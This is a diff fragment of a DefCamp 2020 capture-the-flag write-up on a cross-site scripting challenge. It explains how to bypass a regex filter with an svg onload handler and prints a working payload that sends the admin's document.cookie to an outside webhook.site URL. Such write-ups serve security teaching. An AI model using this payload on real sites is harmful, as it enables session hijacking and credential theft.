bootplug/writeups/2020/defcamp/writeups.md

 After trial and error I found out that the `<svg>` tag is your best bet!
 We can use its **onload** method which is not matched by the regex pattern above. ("load" is shorter than 5 characters).

-Let's test this by fetching the administrators cookie.
+Let's test this by fetching the admin's cookie.
 We can't have spaces, and can't have any `>` tag at the end.
 But it still works:

 `<svg/onload=document.location="https://webhook.site/df13af1d-cb2e-4274-a2d2-56b28becad35?c="+document.cookie//<`